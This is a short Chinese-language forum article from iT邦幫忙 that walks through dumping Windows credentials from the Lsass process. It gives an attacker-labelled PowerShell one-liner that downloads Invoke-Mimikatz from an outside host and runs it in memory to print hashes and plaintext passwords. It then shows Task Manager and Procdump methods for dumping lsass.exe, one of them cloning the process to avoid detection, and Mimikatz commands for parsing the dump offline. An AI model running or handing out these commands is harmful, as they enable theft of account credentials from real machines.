iT邦幫忙

2

從 Lsass 進程中轉儲憑證

  • 分享至 

  • xImage
  •  

使用 Mimikatz 來進行 Lsass 的轉儲

使用 PowerShell 在記憶體中利用 Mimikatz 進行 Local Security Authority (LSA) 憑證轉儲。

Execution

攻擊者@victim
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

受感染系統的hash和明文密碼會被輸出到控制台
image

本地轉儲憑證

一切按預期進行,且 transcript.txt 會顯示 Mimikatz 的輸出:
image

不使用 Mimikatz 來進行 Lsass 的轉儲

Task Manager

使用Task Manager創建 lsass.exe 的小型轉儲檔(必須以管理員身份運行)
image
image
將 lsass.dmp 檔案轉移到攻擊者的電腦上

攻擊者@mimikatz
sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

image

Procdump

Sysinternals 的 Procdump 可以用來進行進程轉儲:

攻擊者@mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp

// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

image
image


圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言